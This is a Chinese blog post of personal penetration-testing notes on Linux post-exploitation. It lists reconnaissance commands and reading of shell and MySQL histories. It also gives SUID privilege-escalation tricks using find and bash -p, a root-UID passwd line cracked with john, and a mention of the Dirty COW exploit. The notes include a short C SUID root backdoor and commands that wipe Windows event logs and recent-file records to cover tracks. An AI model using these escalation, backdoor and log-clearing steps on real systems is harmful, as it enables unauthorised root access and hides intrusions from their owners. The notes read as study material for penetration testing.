内网渗透笔记——与linux相关

最新推荐文章于 2024-07-02 11:36:08 发布

王嘴嘴

最新推荐文章于 2024-07-02 11:36:08 发布

阅读量192

点赞数 1

文章标签： linux 运维安全

本文链接：https://blog.csdn.net/wang_zui_zui/article/details/123144419

版权

信息收集相关命令

查看内核/系统

uname -a
cat /proc/version
hostnamectl
dmesg | grep Linux

lsb_release -a

redhat 红帽下专用命令
cat /etc/redhat-release

getconf LONG_BIT 查看操作系统位数
cat /etc/*release 查看linux发行版信息

查看操作记录

cat ~/.zsh_history
cat ~/.mysql_history
dpkg -l nmap 查找软件版本

预期状态（最前面的第一个字母）
当前状态（最前面的第二个字母）：(i)已安装；（n）未安装

权限

-rwx r-x r-x

-：文件类型（-：文件；d：目录；l：lnk文件软/硬链接）
rwx：当前用户
r-x：同组用户
r-x：其他用户

s权限：在执行该程序的时候，会以文件所有者的权限去执行

root：chmod u+s fileName
- rws --- --- fileName

user$: ./fileName = root#: ./fileName 普通用户user执行filename的时候等于root执行

提权

find命令：

find / -perm -u=s -type f 2>/dev/null 查找有s权限的文件，将错误输出输出到空栈

sudo -l 看看我们能用sudo执行哪些东西（sudo：以管理员身份运行程序）

find 1.txt -exec /bin/bash -p \;（奇怪的操作，先给find赋予s权限，然后利用find的参数-exec去运行bash文件，是以管理员身份去运行）

john 密码爆破工具

echo ajie:SGHLWPbYfiLLg:0:0:sajiea:/root:/bin/bash > pass
john pass

脏牛漏洞

## 脏牛漏洞

编号：CVE-2016-5195

影响范围：2016前十年的linux版本，安卓android

效果：覆盖root用户，重新生成指定用户并且带有特权

在野利用：官方未公布，少数人知道

exp交易：暗网

表层：常规网站

深网：后台等一些看不见的

暗网：需要特殊渠道

简单提权后门

#include<stdio.h>
#include<stdlib.h>
int main(){

        setuid(0);
        system("/bin/bash -p");
}

清除痕迹

msf：clearev

windows：

wevtutil：
   wevtutil el                   查看所有日志
   wevtutil cl   system           清除系统日志
   wevtutil cl application       清除应用程序日志
   wevtutil cl security       清除安全日志

recent(最近操作记录)
   del /f /s /q "%userprofile%\recent\*.\*"

王嘴嘴

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
内网渗透笔记——与linux相关

信息收集相关命令查看内核/系统uname -acat /proc/versionhostnamectldmesg | grep Linuxlsb_release -aredhat 红帽下专用命令 cat /etc/redhat-releasegetconf LONG_BIT 查看操作系统位数cat /etc/*release 查看linux发行版信息查看操作记录cat ~/.zsh_historycat ~/.mysql_historydpkg ...
复制链接

扫一扫